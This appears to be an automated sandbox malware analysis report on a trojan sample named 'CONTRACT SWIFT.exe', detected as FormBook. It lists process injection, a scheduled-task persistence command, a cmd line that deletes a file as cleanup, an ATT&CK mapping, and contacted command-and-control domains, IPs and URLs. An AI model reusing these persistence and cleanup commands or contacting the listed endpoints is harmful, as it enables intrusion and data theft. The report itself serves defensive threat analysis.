Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: C9A008	Jump to behavior

Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\hiCrWx' /XML 'C:\Users\user\AppData\Local\Temp\tmpF496.tmp'	Jump to behavior
Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'	Jump to behavior

Source: explorer.exe, 00000006.00000000.358336746.0000000000EE0000.00000002.00000001.sdmp, netsh.exe, 0000000A.00000002.586665589.0000000005E70000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000000.358336746.0000000000EE0000.00000002.00000001.sdmp, netsh.exe, 0000000A.00000002.586665589.0000000005E70000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000006.00000000.358336746.0000000000EE0000.00000002.00000001.sdmp, netsh.exe, 0000000A.00000002.586665589.0000000005E70000.00000002.00000001.sdmp	Binary or memory string: &Program Manager
Source: explorer.exe, 00000006.00000000.358336746.0000000000EE0000.00000002.00000001.sdmp, netsh.exe, 0000000A.00000002.586665589.0000000005E70000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe	Queries volume information: C:\Users\user\Desktop\CONTRACT SWIFT.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

Uses netsh to modify the Windows network and firewall settings

Show sources

Source: C:\Windows\explorer.exe

Process created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 0000000A.00000002.584803050.0000000000A70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.585533620.0000000003130000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.329773709.0000000003889000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.390820597.0000000001570000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.390721671.0000000001130000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.390558403.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.325826408.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 5.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 0000000A.00000002.584803050.0000000000A70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.585533620.0000000003130000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.329773709.0000000003889000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.390820597.0000000001570000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.390721671.0000000001130000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.390558403.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.325826408.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 5.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Scheduled Task/Job1	Scheduled Task/Job1	Process Injection812	Masquerading1	Input Capture1	Security Software Discovery331	Remote Services	Input Capture1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Shared Modules1	Boot or Logon Initialization Scripts	Scheduled Task/Job1	Disable or Modify Tools11	LSASS Memory	Process Discovery2	Remote Desktop Protocol	Archive Collected Data11	Exfiltration Over Bluetooth	Ingress Tool Transfer3	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Virtualization/Sandbox Evasion41	Security Account Manager	Virtualization/Sandbox Evasion41	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection812	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol13	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Deobfuscate/Decode Files or Information11	LSA Secrets	File and Directory Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Obfuscated Files or Information4	Cached Domain Credentials	System Information Discovery112	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Software Packing23	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
CONTRACT SWIFT.exe	51%	Virustotal		Browse
CONTRACT SWIFT.exe	68%	ReversingLabs	ByteCode-MSIL.Trojan.AgentTesla
CONTRACT SWIFT.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\hiCrWx.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\hiCrWx.exe	68%	ReversingLabs	ByteCode-MSIL.Trojan.AgentTesla

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
5.0.RegSvcs.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen		Download File
5.2.RegSvcs.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen		Download File

Domains

Source	Detection	Scanner	Link
annafelicia.com	0%	Virustotal	Browse
www.votelaura.info	0%	Virustotal	Browse
dominatedirectsales.com	0%	Virustotal	Browse
www.zaseto.com	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
http://i4.cdn-image.com/__media__/pics/27586/searchbtn.png)	0%	Avira URL Cloud	safe
http://www.votelaura.info/s5cm/?IBZlYbB=pvLIMPg9eFmir58zrdlfzpDjY/0Z8Eehky4XMdeWbzjIarYHtSi6dSu8W3U5JLnQBzVy2dgBaA==&7no=4hLljrWPCjYL	0%	Avira URL Cloud	safe
http://www.linjudama.com/s5cm/?IBZlYbB=QDP0f9nkNg998lwZsNWJ9sidgDpm9neJ2Jn8Yw6wtNyTzbKtz13+oJch9rtN8zJ9n3ADBSsMwQ==&7no=4hLljrWPCjYL	0%	Avira URL Cloud	safe
http://www.ursulaaubri.com/s5cm/?IBZlYbB=9JNYajgHrYbNYbSopvhrVmNk2smeMkdKHCjXrMCuWRZh8vUFvgCDFc1eoPxgVigBOF+8gdpYNg==&7no=4hLljrWPCjYL	0%	Avira URL Cloud	safe
http://i4.cdn-image.com/__media__/fonts/open-sans/open-sans.svg#open-sans	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://i4.cdn-image.com/__media__/fonts/open-sans/open-sans.woff	0%	Avira URL Cloud	safe
http://i4.cdn-image.com/__media__/pics/27587/Left.png)	0%	Avira URL Cloud	safe
http://i4.cdn-image.com/__media__/fonts/open-sans/open-sans.eot	0%	Avira URL Cloud	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.rnrsans.com/Healthy_Weight_Loss.cfm?fp=jeFOjF7S5%2Fw47R8mU26RbQJ97fTJVQ5%2BQpUGpNdIkfHtD8	0%	Avira URL Cloud	safe
http://www.annafelicia.com/s5cm/?IBZlYbB=hOQz2MSCtbsxDabSpaSii8/BLtQrJH/yS4IrOYS2fNok4Vr2pjerCtCMkXvIPDZ++8b89cNebQ==&7no=4hLljrWPCjYL	0%	Avira URL Cloud	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://i4.cdn-image.com/__media__/pics/27587/Right.png)	0%	Avira URL Cloud	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://i4.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.woff2	0%	Avira URL Cloud	safe
www.ursulaaubri.com/s5cm/	0%	Avira URL Cloud	safe
http://i4.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.eot	0%	Avira URL Cloud	safe
http://www.rnrsans.com/Contact_Lens.cfm?fp=jeFOjF7S5%2Fw47R8mU26RbQJ97fTJVQ5%2BQpUGpNdIkfHtD8QVYJZQZ	0%	Avira URL Cloud	safe
http://i4.cdn-image.com/__media__/fonts/open-sans/open-sans.otf	0%	Avira URL Cloud	safe
http://www.rnrsans.com/All_Inclusive_Vacation_Packages.cfm?fp=jeFOjF7S5%2Fw47R8mU26RbQJ97fTJVQ5%2BQp	0%	Avira URL Cloud	safe
http://i4.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpg	0%	Avira URL Cloud	safe
http://www.Rnrsans.com	0%	Avira URL Cloud	safe
http://i4.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.otf	0%	Avira URL Cloud	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://i4.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.eot?#iefix	0%	Avira URL Cloud	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://i4.cdn-image.com/__media__/pics/27587/BG_2.png)	0%	Avira URL Cloud	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://i4.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.svg#open-sans-bold	0%	Avira URL Cloud	safe
http://www.rnrsans.com/Top_Smart_Phones.cfm?fp=jeFOjF7S5%2Fw47R8mU26RbQJ97fTJVQ5%2BQpUGpNdIkfHtD8QVY	0%	Avira URL Cloud	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.rnrsans.com/s5cm/?IBZlYbB=56Wx/iK0XerXx9sRleo	0%	Avira URL Cloud	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.rnrsans.com/display.cfm	0%	Avira URL Cloud	safe
http://www.ecms2019.net/s5cm/?IBZlYbB=yzW/lVzvyQ4hEaPsSPteS4HoLyeRwmnuz4XJRK+qZAqpfbP0DQ0qxoao81SCaQD7KmI2MjNCyA==&7no=4hLljrWPCjYL	0%	Avira URL Cloud	safe
http://www.campingquick.com/s5cm/?IBZlYbB=ykmySD41HqpRsFExsLJzaB/DPTfNPkk2Lc0Pz7ATifvot7ncWrGAE7TUgg0cf+ItDyGbmwzT/w==&7no=4hLljrWPCjYL	0%	Avira URL Cloud	safe
http://www.rnrsans.com/__media__/design/underconstructionnotice.php?d=rnrsans.com	0%	Avira URL Cloud	safe
http://i4.cdn-image.com/__media__/fonts/open-sans/open-sans.woff2	0%	Avira URL Cloud	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.rnrsans.com/sk-logabpstatus.php?a=a1Y3UkFVeVRiTlBodXFpOVoxR0NFbExNZWF3aFBMeEs1RGNjTlV0dSs	0%	Avira URL Cloud	safe
http://www.500truyen.com/s5cm/?IBZlYbB=HsBOFNDUa8O5LcaB5EbuTOmydBmLiCE4qYEdmTnH1l0UI2T+HWHUO6KHLkEXg32DLcJSYHPbpA==&7no=4hLljrWPCjYL	0%	Avira URL Cloud	safe
http://i4.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.woff	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.dominatedirectsales.com/s5cm/?IBZlYbB=xBEbFjLoFuodrC/FrIHi+p11i3u3J0p5GQZ8VsaHNTM97bQrkmKUKcAvoM41Kg57v7PXkPt2Cg==&7no=4hLljrWPCjYL	0%	Avira URL Cloud	safe
http://i4.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpg	0%	Avira URL Cloud	safe
http://www.rnrsans.com/__media__/js/trademark.php?d=rnrsans.com&type=ns	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://i4.cdn-image.com/__media__/fonts/open-sans/open-sans.ttf	0%	Avira URL Cloud	safe
http://www.rnrsans.com/s5cm/?IBZlYbB=56Wx/iK0XerXx9sRleo+Maj0Gmk9CoRfrFFa5e3vq65qm4nwUyEHtu+AOd1TMQjYkOCiNEfRCw==&7no=4hLljrWPCjYL	0%	Avira URL Cloud	safe
http://i4.cdn-image.com/__media__/js/min.js?v2.2	0%	Avira URL Cloud	safe
http://www.rnrsans.com/px.js?ch=2	0%	Avira URL Cloud	safe
http://i4.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.ttf	0%	Avira URL Cloud	safe
http://www.qizhukeji.com/s5cm/?IBZlYbB=QmbkDaKiCWkIxq9WLhtviZaKgbI5ygMewBtuG6BOczReuRm3nxGBT9TyrYbv/UczETu56Vlk6A==&7no=4hLljrWPCjYL	0%	Avira URL Cloud	safe
http://www.rnrsans.com/px.js?ch=1	0%	Avira URL Cloud	safe
http://www.rnrsans.com/Free_Credit_Report.cfm?fp=jeFOjF7S5%2Fw47R8mU26RbQJ97fTJVQ5%2BQpUGpNdIkfHtD8Q	0%	Avira URL Cloud	safe
http://i4.cdn-image.com/__media__/fonts/open-sans/open-sans.eot?#iefix	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
annafelicia.com	192.0.78.25	true	true	0%, Virustotal, Browse	unknown
prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com	52.14.32.15	true	false		high
www.votelaura.info	217.160.0.220	true	true	0%, Virustotal, Browse	unknown
dominatedirectsales.com	34.102.136.180	true	false	0%, Virustotal, Browse	unknown
www.zaseto.com	217.198.116.188	true	false	0%, Virustotal, Browse	unknown
www.500truyen.com	172.67.155.68	true	true		unknown
www.ecms2019.net	154.208.179.46	true	true		unknown
www.qizhukeji.com	208.110.82.29	true	true		unknown
www.ursulaaubri.com	91.184.0.43	true	true		unknown
www.rnrsans.com	208.91.197.27	true	true		unknown
shops.myshopify.com	23.227.38.74	true	true		unknown
www.campingquick.com	unknown	unknown	true		unknown
www.byyourstruly.net	unknown	unknown	true		unknown
www.annafelicia.com	unknown	unknown	true		unknown
www.dominatedirectsales.com	unknown	unknown	true		unknown
www.linjudama.com	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.votelaura.info/s5cm/?IBZlYbB=pvLIMPg9eFmir58zrdlfzpDjY/0Z8Eehky4XMdeWbzjIarYHtSi6dSu8W3U5JLnQBzVy2dgBaA==&7no=4hLljrWPCjYL	true	Avira URL Cloud: safe	unknown
http://www.linjudama.com/s5cm/?IBZlYbB=QDP0f9nkNg998lwZsNWJ9sidgDpm9neJ2Jn8Yw6wtNyTzbKtz13+oJch9rtN8zJ9n3ADBSsMwQ==&7no=4hLljrWPCjYL	true	Avira URL Cloud: safe	unknown
http://www.ursulaaubri.com/s5cm/?IBZlYbB=9JNYajgHrYbNYbSopvhrVmNk2smeMkdKHCjXrMCuWRZh8vUFvgCDFc1eoPxgVigBOF+8gdpYNg==&7no=4hLljrWPCjYL	true	Avira URL Cloud: safe	unknown
http://www.annafelicia.com/s5cm/?IBZlYbB=hOQz2MSCtbsxDabSpaSii8/BLtQrJH/yS4IrOYS2fNok4Vr2pjerCtCMkXvIPDZ++8b89cNebQ==&7no=4hLljrWPCjYL	true	Avira URL Cloud: safe	unknown
www.ursulaaubri.com/s5cm/	true	Avira URL Cloud: safe	low
http://www.ecms2019.net/s5cm/?IBZlYbB=yzW/lVzvyQ4hEaPsSPteS4HoLyeRwmnuz4XJRK+qZAqpfbP0DQ0qxoao81SCaQD7KmI2MjNCyA==&7no=4hLljrWPCjYL	true	Avira URL Cloud: safe	unknown
http://www.campingquick.com/s5cm/?IBZlYbB=ykmySD41HqpRsFExsLJzaB/DPTfNPkk2Lc0Pz7ATifvot7ncWrGAE7TUgg0cf+ItDyGbmwzT/w==&7no=4hLljrWPCjYL	true	Avira URL Cloud: safe	unknown
http://www.500truyen.com/s5cm/?IBZlYbB=HsBOFNDUa8O5LcaB5EbuTOmydBmLiCE4qYEdmTnH1l0UI2T+HWHUO6KHLkEXg32DLcJSYHPbpA==&7no=4hLljrWPCjYL	true	Avira URL Cloud: safe	unknown
http://www.dominatedirectsales.com/s5cm/?IBZlYbB=xBEbFjLoFuodrC/FrIHi+p11i3u3J0p5GQZ8VsaHNTM97bQrkmKUKcAvoM41Kg57v7PXkPt2Cg==&7no=4hLljrWPCjYL	false	Avira URL Cloud: safe	unknown
http://www.rnrsans.com/s5cm/?IBZlYbB=56Wx/iK0XerXx9sRleo+Maj0Gmk9CoRfrFFa5e3vq65qm4nwUyEHtu+AOd1TMQjYkOCiNEfRCw==&7no=4hLljrWPCjYL	true	Avira URL Cloud: safe	unknown
http://www.qizhukeji.com/s5cm/?IBZlYbB=QmbkDaKiCWkIxq9WLhtviZaKgbI5ygMewBtuG6BOczReuRm3nxGBT9TyrYbv/UczETu56Vlk6A==&7no=4hLljrWPCjYL	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://i4.cdn-image.com/__media__/pics/27586/searchbtn.png)	netsh.exe, 0000000A.00000002.586390200.0000000003E02000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designersG	explorer.exe, 00000006.00000000.349805749.000000000B1A6000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designers/?	explorer.exe, 00000006.00000000.349805749.000000000B1A6000.00000002.00000001.sdmp	false		high
http://i4.cdn-image.com/__media__/fonts/open-sans/open-sans.svg#open-sans	netsh.exe, 0000000A.00000002.586390200.0000000003E02000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.founder.com.cn/cn/bThe	explorer.exe, 00000006.00000000.349805749.000000000B1A6000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://i4.cdn-image.com/__media__/fonts/open-sans/open-sans.woff	netsh.exe, 0000000A.00000002.586390200.0000000003E02000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers?	explorer.exe, 00000006.00000000.349805749.000000000B1A6000.00000002.00000001.sdmp	false		high
http://i4.cdn-image.com/__media__/pics/27587/Left.png)	netsh.exe, 0000000A.00000002.586390200.0000000003E02000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://i4.cdn-image.com/__media__/fonts/open-sans/open-sans.eot	netsh.exe, 0000000A.00000002.586390200.0000000003E02000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.tiro.com	explorer.exe, 00000006.00000000.349805749.000000000B1A6000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.rnrsans.com/Healthy_Weight_Loss.cfm?fp=jeFOjF7S5%2Fw47R8mU26RbQJ97fTJVQ5%2BQpUGpNdIkfHtD8	netsh.exe, 0000000A.00000002.586390200.0000000003E02000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers	explorer.exe, 00000006.00000000.349805749.000000000B1A6000.00000002.00000001.sdmp	false		high
http://www.goodfont.co.kr	explorer.exe, 00000006.00000000.349805749.000000000B1A6000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css	CONTRACT SWIFT.exe, 00000001.00000002.327293465.0000000002881000.00000004.00000001.sdmp	false		high
http://i4.cdn-image.com/__media__/pics/27587/Right.png)	netsh.exe, 0000000A.00000002.586390200.0000000003E02000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.sajatypeworks.com	explorer.exe, 00000006.00000000.349805749.000000000B1A6000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.typography.netD	explorer.exe, 00000006.00000000.349805749.000000000B1A6000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cn/cThe	explorer.exe, 00000006.00000000.349805749.000000000B1A6000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	explorer.exe, 00000006.00000000.349805749.000000000B1A6000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://fontfabrik.com	explorer.exe, 00000006.00000000.349805749.000000000B1A6000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://i4.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.woff2	netsh.exe, 0000000A.00000002.586390200.0000000003E02000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://i4.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.eot	netsh.exe, 0000000A.00000002.586390200.0000000003E02000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.rnrsans.com/Contact_Lens.cfm?fp=jeFOjF7S5%2Fw47R8mU26RbQJ97fTJVQ5%2BQpUGpNdIkfHtD8QVYJZQZ	netsh.exe, 0000000A.00000002.586390200.0000000003E02000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://i4.cdn-image.com/__media__/fonts/open-sans/open-sans.otf	netsh.exe, 0000000A.00000002.586390200.0000000003E02000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.rnrsans.com/All_Inclusive_Vacation_Packages.cfm?fp=jeFOjF7S5%2Fw47R8mU26RbQJ97fTJVQ5%2BQp	netsh.exe, 0000000A.00000002.586390200.0000000003E02000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://i4.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpg	netsh.exe, 0000000A.00000002.586390200.0000000003E02000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.Rnrsans.com	netsh.exe, 0000000A.00000002.586390200.0000000003E02000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/Brian151/CAC-Building-Editor	CONTRACT SWIFT.exe, 00000001.00000002.327293465.0000000002881000.00000004.00000001.sdmp	false		high
http://i4.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.otf	netsh.exe, 0000000A.00000002.586390200.0000000003E02000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.galapagosdesign.com/DPlease	explorer.exe, 00000006.00000000.349805749.000000000B1A6000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://i4.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.eot?#iefix	netsh.exe, 0000000A.00000002.586390200.0000000003E02000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fonts.com	explorer.exe, 00000006.00000000.349805749.000000000B1A6000.00000002.00000001.sdmp	false		high
http://www.sandoll.co.kr	explorer.exe, 00000006.00000000.349805749.000000000B1A6000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://i4.cdn-image.com/__media__/pics/27587/BG_2.png)	netsh.exe, 0000000A.00000002.586390200.0000000003E02000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.urwpp.deDPlease	explorer.exe, 00000006.00000000.349805749.000000000B1A6000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://i4.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.svg#open-sans-bold	netsh.exe, 0000000A.00000002.586390200.0000000003E02000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.rnrsans.com/Top_Smart_Phones.cfm?fp=jeFOjF7S5%2Fw47R8mU26RbQJ97fTJVQ5%2BQpUGpNdIkfHtD8QVY	netsh.exe, 0000000A.00000002.586390200.0000000003E02000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.zhongyicts.com.cn	explorer.exe, 00000006.00000000.349805749.000000000B1A6000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
